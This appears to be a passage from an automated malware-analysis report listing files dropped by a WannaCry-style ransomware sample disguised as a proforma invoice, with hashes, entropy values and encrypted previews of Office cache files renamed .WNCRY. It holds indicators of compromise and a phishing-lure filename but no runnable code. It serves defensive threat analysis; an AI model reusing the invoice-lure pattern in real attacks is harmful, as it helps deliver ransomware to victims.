                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36264
                                                          Entropy (8bit):7.99525127512748
                                                          Encrypted:true
                                                          SSDEEP:768:35XTr92JFG2cwsiIGBa6i3OUhCWhTuwwNg8+qYg0iakIEiVH9YeZK:V392HGc9IGBaLxRhT6gnieR9Yv
                                                          MD5:E38B55A138F130687043C4137520C383
                                                          SHA1:4ABBEC721E1DB5F37D040480766FD70856AB7D02
                                                          SHA-256:D7DAC6D0A27416A3873A4B80EC375B47E1D5DB3BCC8495D2F3E5C75FBED577DE
                                                          SHA-512:1AB0ADCE244CBD9026843F1C941FFE10AED6FC5AA7213E416DC7DB696FD07BB7D09C3F97EDB6093CAB185692D10F22EA38B886B420F35D9BC52118A2622B8D00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.u...F+.<M...:f...f..2...d.......wb.d.....MA..#.+...GP..*.^..M..PN#.&06mYht,B...`DUQ`S.....r...K...h.]]rk...<[..@-..g.e-...h..0e.&u....D..l....X...O..'....g..)F[/....0u_.z_...TEH..#1.....t......@.m.S...x_w~s..4.O.,....C.`T}...{.Mc.E_...................+.ug.^.....x..kN:..0.."....ZJ..]....b..r.j.k...Q..*9v...9.!...e.,..Z..mo.m..../..}G..n}.ir...K..e.L.......w..7\s..2...........1...a....|.......|5(.......b..$..U.&......~...x....x.P..JM..#.\NH.{.....=............5.LC...BY...."..r#1.Y.V....YR./.Lnn...T..Td.........T.....6._.;.Qq..Z.,.X.W...I.~!..`...........;...6.d.u...b|.._L.m7*N.....=@.[.bXg~...G..c.,.....rr..;....R.nt._.#..i..D&....|.......f.#+c.R..'.%L..U>yl....qx...Qox_~D..1.6.!..h...\.....;.*G_.~3]\S.=..f..|.@..CEE.g..,A.2?IV.....M......EL.L....#$.jI.=j<...&C....!9/G..:8.d.s.23..Cg.........mg..ij.k.[.M.i\W.?...z........G.|=7#..u...,?W.g..N........;..EH..zy:.']b.%.._.~.E9..m~yU.9b......%S.^...L.....f..G.W.O../.<i2L..R......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21048
                                                          Entropy (8bit):7.989688780000734
                                                          Encrypted:false
                                                          SSDEEP:384:uolDjOvPpqNEDM5G67K7reddTioC+GGuGastTAwDWE3UPqvF/uFM9PujhPj:uo9joqqWG6m/ePXBjjtSDM9PkJj
                                                          MD5:EBE24CFB6D90E796F93954899B86FD03
                                                          SHA1:4F52BC82A2FB0047088009270C824969688BC6EB
                                                          SHA-256:6A75940E06BC98C42A991808F3B860B5E76407BC8D3B13EE0630C024FF46C20F
                                                          SHA-512:06B82EC41311F96C7F0DCAAD6E063D1A1055764E4C803480C418BBF94315F8387EDA8A4796EFA73233A1D2CB65860816EB850360C7EF479E6C74F6ED151CC9A1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*......{.6...M...6.`..,.....cJj.....9.d..^.zZ?eyj..0.W.p1.qo....9..T).u.I0Q.)...#i........C/3"...V..JyIZ.mm...5".^%o.....|.w....f.y.=...-..B\.....j.|..3..J.....A7..D.|oH.[=.emk^.s..d...E.......h.hFP.d...k.)...[a........+c.I(...Z...X.e...]xUp y.......Q......0......Bl.......]?.h...=c%...tM./..!.>r.[.{.*.n.g.ar:.}.......V..2..d....j....%.Q8u.;.u..'K....\N.h......."..a.....5.d.`.X..u..+......[.x..{.M..d.....$H.V........V.3'0.p..<H=..3Ekj~..O.."..L..Wh.:...8X..4j..V.K...(+/>.j..c.X7.-.-h.v..x..q..a,..u-NS.S-......S.......*......D....d....a{.......y...-r..YN ...R;I]..0d......7..1.5.y....P.%..!.U..$.1IJ..k.X.".....ya.sti=.C.,T.#...m.>...'\..s.F..pC&.......;..{.]..S.0.|..Z..].2..DG.=..j1..6J.x.7.O...!.W.e........9.....p.T.../.C....p&.8...O.,..$*.}Pgr..J.\..L...G..%P....#.y....78.q...3...N<..q.aMt.]......L.{..e.H"+..y..q2.5TaO.u.....9.Y......'......x..M.._.....r_..yp.m/.....Z.mS..v.9~..5..!7`.jy=..p_t.h.n.Ng.....G.r..q....P....^...{.U...#.7*L..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21048
                                                          Entropy (8bit):7.989688780000734
                                                          Encrypted:false
                                                          SSDEEP:384:uolDjOvPpqNEDM5G67K7reddTioC+GGuGastTAwDWE3UPqvF/uFM9PujhPj:uo9joqqWG6m/ePXBjjtSDM9PkJj
                                                          MD5:EBE24CFB6D90E796F93954899B86FD03
                                                          SHA1:4F52BC82A2FB0047088009270C824969688BC6EB
                                                          SHA-256:6A75940E06BC98C42A991808F3B860B5E76407BC8D3B13EE0630C024FF46C20F
                                                          SHA-512:06B82EC41311F96C7F0DCAAD6E063D1A1055764E4C803480C418BBF94315F8387EDA8A4796EFA73233A1D2CB65860816EB850360C7EF479E6C74F6ED151CC9A1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*......{.6...M...6.`..,.....cJj.....9.d..^.zZ?eyj..0.W.p1.qo....9..T).u.I0Q.)...#i........C/3"...V..JyIZ.mm...5".^%o.....|.w....f.y.=...-..B\.....j.|..3..J.....A7..D.|oH.[=.emk^.s..d...E.......h.hFP.d...k.)...[a........+c.I(...Z...X.e...]xUp y.......Q......0......Bl.......]?.h...=c%...tM./..!.>r.[.{.*.n.g.ar:.}.......V..2..d....j....%.Q8u.;.u..'K....\N.h......."..a.....5.d.`.X..u..+......[.x..{.M..d.....$H.V........V.3'0.p..<H=..3Ekj~..O.."..L..Wh.:...8X..4j..V.K...(+/>.j..c.X7.-.-h.v..x..q..a,..u-NS.S-......S.......*......D....d....a{.......y...-r..YN ...R;I]..0d......7..1.5.y....P.%..!.U..$.1IJ..k.X.".....ya.sti=.C.,T.#...m.>...'\..s.F..pC&.......;..{.]..S.0.|..Z..].2..DG.=..j1..6J.x.7.O...!.W.e........9.....p.T.../.C....p&.8...O.,..$*.}Pgr..J.\..L...G..%P....#.y....78.q...3...N<..q.aMt.]......L.{..e.H"+..y..q2.5TaO.u.....9.Y......'......x..M.._.....r_..yp.m/.....Z.mS..v.9~..5..!7`.jy=..p_t.h.n.Ng.....G.r..q....P....^...{.U...#.7*L..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\unauth-apps-image-46596a6856[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7304
                                                          Entropy (8bit):7.975669041076748
                                                          Encrypted:false
                                                          SSDEEP:192:mBEhFlyR0oyE97aDKOeK8CQT03Qx7fBcdiCStj4an:eEhFlyGEQzeK8CbQx7ZrCStH
                                                          MD5:DD85793535191516B6ED4C9BD353EF6E
                                                          SHA1:4AC3BD53973A75BA347A7E0C3896C14CC72DFDA4
                                                          SHA-256:C4920DCB14844ADA279EFE59468059B5EE13B4EE94B99AEEE053DBD5F158134A
                                                          SHA-512:BCAB937B43D13173CF46AF11686D9575A648F5A6CB6E4B7E95D24FA48E777C5788BDD2892F0A2B4686DCA78F4E99D767E47CADEF1844905C295E8D087871E894
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N..ui...X...W.X.s.c.k.".7.q>......x...9....)....3.....y.....G......HL..k.;>y..-..........1....y...[/.}..Bd.Q..2m.]....g......Y........z.R'bc.......b3Z..0?.'....<+T.......T..W....F.Qv..........H....*.<.......b.z....6.Z.T\..Q.T.G..\.....E....o.......B.81.6<...r.hk.......P......z....d(]...,......;..{3.* ..r...:....Z.X@...k{.....E...6.:t...g.l.8W...j.B...o..L...u.3.aN........:.2.......'m..B.y.&U....}....=L.j'.D......:.@.c`K ...w...1h...4......;.1Y...^..Q.............."..m..\r.....[C:...aoP......I.=.>......0un.dU...FMV..n.U....~.4x..n......&. ,71......#m..td.w..A.........T..Z......fXv..Dk?...n.. ....<!....N......2!.D.-Y2o... ...m../K.........o~i.|.i.$.9.<....L.V/....Hx...*._.v;.ZF.VB>.q.1y<A*../..O....zD,...|.@.'.2./=}$.L^..j..(n.P...[Z.\> ....'...^.=.>O(..`....i..,"]....:.IOf..`..I.f......S....x...0.w".e.zKJ"...A..s...!...).}...uZjPa.^...^eWyM.[.-`.B.....C.4.Dw..L.;.."...X..-.....;.6.9.3_....?.l...zR.{...e8...7_..J....ba..2d/..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\unauth-apps-image-46596a6856[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7304
                                                          Entropy (8bit):7.975669041076748
                                                          Encrypted:false
                                                          SSDEEP:192:mBEhFlyR0oyE97aDKOeK8CQT03Qx7fBcdiCStj4an:eEhFlyGEQzeK8CbQx7ZrCStH
                                                          MD5:DD85793535191516B6ED4C9BD353EF6E
                                                          SHA1:4AC3BD53973A75BA347A7E0C3896C14CC72DFDA4
                                                          SHA-256:C4920DCB14844ADA279EFE59468059B5EE13B4EE94B99AEEE053DBD5F158134A
                                                          SHA-512:BCAB937B43D13173CF46AF11686D9575A648F5A6CB6E4B7E95D24FA48E777C5788BDD2892F0A2B4686DCA78F4E99D767E47CADEF1844905C295E8D087871E894
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N..ui...X...W.X.s.c.k.".7.q>......x...9....)....3.....y.....G......HL..k.;>y..-..........1....y...[/.}..Bd.Q..2m.]....g......Y........z.R'bc.......b3Z..0?.'....<+T.......T..W....F.Qv..........H....*.<.......b.z....6.Z.T\..Q.T.G..\.....E....o.......B.81.6<...r.hk.......P......z....d(]...,......;..{3.* ..r...:....Z.X@...k{.....E...6.:t...g.l.8W...j.B...o..L...u.3.aN........:.2.......'m..B.y.&U....}....=L.j'.D......:.@.c`K ...w...1h...4......;.1Y...^..Q.............."..m..\r.....[C:...aoP......I.=.>......0un.dU...FMV..n.U....~.4x..n......&. ,71......#m..td.w..A.........T..Z......fXv..Dk?...n.. ....<!....N......2!.D.-Y2o... ...m../K.........o~i.|.i.$.9.<....L.V/....Hx...*._.v;.ZF.VB>.q.1y<A*../..O....zD,...|.@.'.2./=}$.L^..j..(n.P...[Z.\> ....'...^.=.>O(..`....i..,"]....:.IOf..`..I.f......S....x...0.w".e.zKJ"...A..s...!...).}...uZjPa.^...^eWyM.[.-`.B.....C.4.Dw..L.;.."...X..-.....;.6.9.3_....?.l...zR.{...e8...7_..J....ba..2d/..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80360
                                                          Entropy (8bit):7.997936750840787
                                                          Encrypted:true
                                                          SSDEEP:1536:waCNaQxdakfQUkp7c3/S2gT6lHgymDujTETq6RfzQFr39/ijMCYP:waCUQxdxQUkS3q3SgynfONzQ//iwCYP
                                                          MD5:818B927FD8BC1B2044F8C1047FCB40E5
                                                          SHA1:D03932B26E79CD4133DBB8DDDCA6E9E95E998D13
                                                          SHA-256:AA3F60C2D75986B686C6A3C4721A50C23D938213F8502D95D52073636DCB6082
                                                          SHA-512:BFA42AC2FE4BDD184BA7050F2D86EF3938C3325991B30F53E12B008AD816560D2D4ADF5B8E36FA36C546DE495259A0622941A79BB7EC55A40B10E32CE3030680
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......>.\..1.J.PeZ...&K%L...mH#.@.....2..D.....D.C.>GN.......H..>d..Wa..L.at\%....,..l....tj0.......0.#.H..fI.]tdE.g?u+(..~.y..3'...N=..J....n...6....TW..j..E.e..Q.b7..Q.u...Cn...6G..sd.*...O.'..X..8...`..@`V..UyY..cE.....&...4./....,e....Q......'.....8........QlK...#.~.Z....xt.$..>..m'..S.....+...?..6P..e..RCg.x.m.2&..=8q..m..l.<.HG..!...s.uM...d..~..(F.&Uk..F'.^k\@".0O<k.z..(..)[.^t.^../....x...,x.9......_.$.T..'.u.~..Q..E>);`.7MM..H-.T{.......;D%...T8.x...Q.gP.........z.V.u.....~.T.7..A....6...U....t.A.p..i^.......I...:m/........_.....6..KV.._..8.4.g....'...H.J..c.....-..2..<.}W..{6....._.&.0I..f.5K.5-d5y.e........(w.oY.9.q..e........].....#....E..g.o)r7.;B..2N....;.#..G.S.....a.n.......,3..b...WVbc!.1:Da.....Z.c..R....,..d..I.f.O2D*.....> ..Gw...t.}.{P.|.y....i..3..iu.D.|...,......B.Imw?.....C...vV.5_C.1...E...7....D...2.h/g.P....D.......}...H.....M...d...!H.4.*ZM..eY4..Y.sM..YL_D....H...c.....C..&.....{] c.........Gp|..Ct|..w.n-H,`

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80360
                                                          Entropy (8bit):7.997936750840787
                                                          Encrypted:true
                                                          SSDEEP:1536:waCNaQxdakfQUkp7c3/S2gT6lHgymDujTETq6RfzQFr39/ijMCYP:waCUQxdxQUkS3q3SgynfONzQ//iwCYP
                                                          MD5:818B927FD8BC1B2044F8C1047FCB40E5
                                                          SHA1:D03932B26E79CD4133DBB8DDDCA6E9E95E998D13
                                                          SHA-256:AA3F60C2D75986B686C6A3C4721A50C23D938213F8502D95D52073636DCB6082
                                                          SHA-512:BFA42AC2FE4BDD184BA7050F2D86EF3938C3325991B30F53E12B008AD816560D2D4ADF5B8E36FA36C546DE495259A0622941A79BB7EC55A40B10E32CE3030680
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......>.\..1.J.PeZ...&K%L...mH#.@.....2..D.....D.C.>GN.......H..>d..Wa..L.at\%....,..l....tj0.......0.#.H..fI.]tdE.g?u+(..~.y..3'...N=..J....n...6....TW..j..E.e..Q.b7..Q.u...Cn...6G..sd.*...O.'..X..8...`..@`V..UyY..cE.....&...4./....,e....Q......'.....8........QlK...#.~.Z....xt.$..>..m'..S.....+...?..6P..e..RCg.x.m.2&..=8q..m..l.<.HG..!...s.uM...d..~..(F.&Uk..F'.^k\@".0O<k.z..(..)[.^t.^../....x...,x.9......_.$.T..'.u.~..Q..E>);`.7MM..H-.T{.......;D%...T8.x...Q.gP.........z.V.u.....~.T.7..A....6...U....t.A.p..i^.......I...:m/........_.....6..KV.._..8.4.g....'...H.J..c.....-..2..<.}W..{6....._.&.0I..f.5K.5-d5y.e........(w.oY.9.q..e........].....#....E..g.o)r7.;B..2N....;.#..G.S.....a.n.......,3..b...WVbc!.1:Da.....Z.c..R....,..d..I.f.O2D*.....> ..Gw...t.}.{P.|.y....i..3..iu.D.|...,......B.Imw?.....C...vV.5_C.1...E...7....D...2.h/g.P....D.......}...H.....M...d...!H.4.*ZM..eY4..Y.sM..YL_D....H...c.....C..&.....{] c.........Gp|..Ct|..w.n-H,`

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):43880
                                                          Entropy (8bit):7.995194162208107
                                                          Encrypted:true
                                                          SSDEEP:768:Z+YrxUN6FCLE5+ruZD+hCdCMS79HZggDCRZO984IHKEwvRUWQ/D2fsg5eRHV:Z+gZFC0QOKLDR5g/wUHKf5BQiUg5eR1
                                                          MD5:D1CACEC8740292398D6A54EF944A2590
                                                          SHA1:2BA6C240F893DE707421F3F8427E96B515EC4F6E
                                                          SHA-256:3539995A7AD37D802715A051CFB94719F80F0CDD707CCDE1CC318B933C7A8E70
                                                          SHA-512:1252ECFF90275215FEDA9C6372B9C14BCA6BCEA3F26B60EC8A8B596ADDE4DD4C776D6D4420A0B156190FD6456FE16E0A46234C7CE5337920E61D4CDCD968EBA8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........la..**.g.....SlI.%.[pK..b...........v..f...L...+.@..x.I......7F.N2.6.......7..+..B....4..._.;...5].B.;{..fA*.i.4.:.........tJU..:...Kj>.x.;...#.?..4.....^g!...<.......;.y[.JRj%n`}Q..6.w;,.D..?..-g..g4q...^....{...p_...U93H.5D.wu...8.n]....H...........'............Lh..'....]<p..X=...:...........v..".L...i....>.!...x0..'......2.5..Kn...o.H.'.?-i|&..U..E.ye...i@.......sX}.|.3...\:..;sSD.......).k...2..;..%.:.W.#.+.9..U......~xV.O~4...x..G;.....r`..X*..g..J..E.=r...g.KB..,A^..s..0...../.)...:....-u..z.....h&./.:..F.."..\~.Q.3.}......|.7.E.....j=...[6U...........E....."...eb......b.nu.]..O.q..Fwm)P.h ..<.2.H...._+6......X.ST:.....|...Cq....R7.....p...7...&#X........X.F...rk.o...$.e..a......I..Z.V.uy..39$.....W..^..6...F..R..=...Lb...JGWe... M<....!.5F..j#._.t..v...+'$.P..J.A..."D@.....$.*..kJ..3.9.-.#Y.T...d..o.."=....I.q.....zW.D.j...!..S.=..T....!.....3\.i.Gh.......?...i3.....VI.......v..'|......^..M.l...^.m...J

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):43880
                                                          Entropy (8bit):7.995194162208107
                                                          Encrypted:true
                                                          SSDEEP:768:Z+YrxUN6FCLE5+ruZD+hCdCMS79HZggDCRZO984IHKEwvRUWQ/D2fsg5eRHV:Z+gZFC0QOKLDR5g/wUHKf5BQiUg5eR1
                                                          MD5:D1CACEC8740292398D6A54EF944A2590
                                                          SHA1:2BA6C240F893DE707421F3F8427E96B515EC4F6E
                                                          SHA-256:3539995A7AD37D802715A051CFB94719F80F0CDD707CCDE1CC318B933C7A8E70
                                                          SHA-512:1252ECFF90275215FEDA9C6372B9C14BCA6BCEA3F26B60EC8A8B596ADDE4DD4C776D6D4420A0B156190FD6456FE16E0A46234C7CE5337920E61D4CDCD968EBA8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........la..**.g.....SlI.%.[pK..b...........v..f...L...+.@..x.I......7F.N2.6.......7..+..B....4..._.;...5].B.;{..fA*.i.4.:.........tJU..:...Kj>.x.;...#.?..4.....^g!...<.......;.y[.JRj%n`}Q..6.w;,.D..?..-g..g4q...^....{...p_...U93H.5D.wu...8.n]....H...........'............Lh..'....]<p..X=...:...........v..".L...i....>.!...x0..'......2.5..Kn...o.H.'.?-i|&..U..E.ye...i@.......sX}.|.3...\:..;sSD.......).k...2..;..%.:.W.#.+.9..U......~xV.O~4...x..G;.....r`..X*..g..J..E.=r...g.KB..,A^..s..0...../.)...:....-u..z.....h&./.:..F.."..\~.Q.3.}......|.7.E.....j=...[6U...........E....."...eb......b.nu.]..O.q..Fwm)P.h ..<.2.H...._+6......X.ST:.....|...Cq....R7.....p...7...&#X........X.F...rk.o...$.e..a......I..Z.V.uy..39$.....W..^..6...F..R..=...Lb...JGWe... M<....!.5F..j#._.t..v...+'$.P..J.A..."D@.....$.*..kJ..3.9.-.#Y.T...d..o.."=....I.q.....zW.D.j...!..S.=..T....!.....3\.i.Gh.......?...i3.....VI.......v..'|......^..M.l...^.m...J

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\unauth-checkmark-image-1999f0bf81[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.556160222280445
                                                          Encrypted:false
                                                          SSDEEP:12:bkEC+/7XUHxpX2t522qw++ijqb3ClhwJTlmL0Muy4o3:bkvxpGt5Ojqb3Chw1Oky4o3
                                                          MD5:7E4478281E6DB69574C8467853F5FEB6
                                                          SHA1:A8DE16794F1A6DC64D1574A63CBD3E6734E5E819
                                                          SHA-256:D25AA0D0A74EB308B0D563200E9354518ADEE7FFC3583913BC3DB236E2F646D6
                                                          SHA-512:D3FC3777DCB4B3756E270DA38A7858BC4A32BA61E1A2C10DF465532E5917FC7BB074C298F347E16D5B34541C5CFD830F8B0B4A7B640A19A9ACE6BCF267F5AD91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Xf.{.T...c.3.t.aR!..!r&..<.O+.KU..q...0J....$'....|q...D.cKX)...,...kc..6zJ..tf.._(.~..z4@H*...l.....<..;.B.[._.(...UI..K..b..D..7......]........4..4X....wN.a.....s...\......X...z....|..M+.a.n......<......i......ql.2VA.w.|.e.,...o.s.T....#........._eRR..9KPR-....d>......z.P.<.2s.....p.X.M...J.......+.^.9O...O=}..<....S.....}#}6....J.....7.8..b}..;u...}.ys...%.8..$2....Q.KI..8}..`4y.].S.m:..9.d..:.1....V..m.nU..m.,.A.+.....7....P......1..\......wc.........6.LPPk... ..`e...IAA..gW.L.f7.s..A.......v.P2_2............o/$5..D..1..:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\unauth-checkmark-image-1999f0bf81[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.556160222280445
                                                          Encrypted:false
                                                          SSDEEP:12:bkEC+/7XUHxpX2t522qw++ijqb3ClhwJTlmL0Muy4o3:bkvxpGt5Ojqb3Chw1Oky4o3
                                                          MD5:7E4478281E6DB69574C8467853F5FEB6
                                                          SHA1:A8DE16794F1A6DC64D1574A63CBD3E6734E5E819
                                                          SHA-256:D25AA0D0A74EB308B0D563200E9354518ADEE7FFC3583913BC3DB236E2F646D6
                                                          SHA-512:D3FC3777DCB4B3756E270DA38A7858BC4A32BA61E1A2C10DF465532E5917FC7BB074C298F347E16D5B34541C5CFD830F8B0B4A7B640A19A9ACE6BCF267F5AD91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Xf.{.T...c.3.t.aR!..!r&..<.O+.KU..q...0J....$'....|q...D.cKX)...,...kc..6zJ..tf.._(.~..z4@H*...l.....<..;.B.[._.(...UI..K..b..D..7......]........4..4X....wN.a.....s...\......X...z....|..M+.a.n......<......i......ql.2VA.w.|.e.,...o.s.T....#........._eRR..9KPR-....d>......z.P.<.2s.....p.X.M...J.......+.^.9O...O=}..<....S.....}#}6....J.....7.8..b}..;u...}.ys...%.8..$2....Q.KI..8}..`4y.].S.m:..9.d..:.1....V..m.nU..m.,.A.+.....7....P......1..\......wc.........6.LPPk... ..`e...IAA..gW.L.f7.s..A.......v.P2_2............o/$5..D..1..:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):138488
                                                          Entropy (8bit):7.998652014501591
                                                          Encrypted:true
                                                          SSDEEP:3072:fB647rfbMxm8bB/PSPRHA79rruvO0ltY6aqf6Y73gwCpB0YYWgpuYKvKM:fB6sf9E3SPRY8W0ltYJqyYjYBqvlDM
                                                          MD5:FECF657BE420045A5967DCA9142F55B8
                                                          SHA1:C4CED122997F57C5C7D7D2BCBF88683F9CE80232
                                                          SHA-256:F4374ACBCDBB7FF065C56A0EBBFE1F6F752A13BC02F081515D29AFD0A437CD93
                                                          SHA-512:3593690B8647D0494BA8F2411E7B1E7416D1030DB43445802536D6197D6F79E91804CEC10D61F9C371EA8F5D2F61F59863A3B1998EBE92604B6083688230B537
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u....~...0?.P8.s..-.[.fM.@3..(V.R.7K..8.....;.AO..?%....[...-S.A.QL.....a.o5.....`P'n..}.j>..........>.4E...%.H.<.r.v3=@...C...@s..e;3.......]...6.z.......TJ.K,..[...SC.......7..0.m.d=.u.Fd$!D.!...].L.".;..6i.v...^+../I..;.z.O...z....J..................)..a3^.95j..G.!.....Y.*=...^..........8.......*.V....+.i...E........T.^.....{uyO..}.... K..{....fEy....N#....b..1Sr.tIU.V.#...@.7K....E...t{....X.l.p."AW.,.;p.Qe...).vN...s~...<O...HTd...wf.B-.Q.]...N.].7..0P.&|gO......4.....5.#TQV.B.iL.i.kO|.b.....w.C....?....f.F....d....(....V..z/...5u..H.l..9|.:..ma.....8...d..N|... ..pP...f.g."q.....uov.Y.._...}r.}.....M.y..V@JN.u..R".e.c:.'..-l..V.......E.,........+..Y..2..6"..2)..o...f.B...l..U.>..........`....S>..P.....T.}^...v.B....f.,.....'.k....Q.....9 T@.|......D..4.Fn.Z..fy,...eK...Z.)u.sb....%.....1.3...^..H?.f..c...7.C...h..[+K}_....!.sP...;.........$..........._.\)..8.......>6.2.i.i.........U_.MM..!.4#9K=..=.!.d.w;}.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):138488
                                                          Entropy (8bit):7.998652014501591
                                                          Encrypted:true
                                                          SSDEEP:3072:fB647rfbMxm8bB/PSPRHA79rruvO0ltY6aqf6Y73gwCpB0YYWgpuYKvKM:fB6sf9E3SPRY8W0ltYJqyYjYBqvlDM
                                                          MD5:FECF657BE420045A5967DCA9142F55B8
                                                          SHA1:C4CED122997F57C5C7D7D2BCBF88683F9CE80232
                                                          SHA-256:F4374ACBCDBB7FF065C56A0EBBFE1F6F752A13BC02F081515D29AFD0A437CD93
                                                          SHA-512:3593690B8647D0494BA8F2411E7B1E7416D1030DB43445802536D6197D6F79E91804CEC10D61F9C371EA8F5D2F61F59863A3B1998EBE92604B6083688230B537
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u....~...0?.P8.s..-.[.fM.@3..(V.R.7K..8.....;.AO..?%....[...-S.A.QL.....a.o5.....`P'n..}.j>..........>.4E...%.H.<.r.v3=@...C...@s..e;3.......]...6.z.......TJ.K,..[...SC.......7..0.m.d=.u.Fd$!D.!...].L.".;..6i.v...^+../I..;.z.O...z....J..................)..a3^.95j..G.!.....Y.*=...^..........8.......*.V....+.i...E........T.^.....{uyO..}.... K..{....fEy....N#....b..1Sr.tIU.V.#...@.7K....E...t{....X.l.p."AW.,.;p.Qe...).vN...s~...<O...HTd...wf.B-.Q.]...N.].7..0P.&|gO......4.....5.#TQV.B.iL.i.kO|.b.....w.C....?....f.F....d....(....V..z/...5u..H.l..9|.:..ma.....8...d..N|... ..pP...f.g."q.....uov.Y.._...}r.}.....M.y..V@JN.u..R".e.c:.'..-l..V.......E.,........+..Y..2..6"..2)..o...f.B...l..U.>..........`....S>..P.....T.}^...v.B....f.,.....'.k....Q.....9 T@.|......D..4.Fn.Z..fy,...eK...Z.)u.sb....%.....1.3...^..H?.f..c...7.C...h..[+K}_....!.sP...;.........$..........._.\)..8.......>6.2.i.i.........U_.MM..!.4#9K=..=.!.d.w;}.

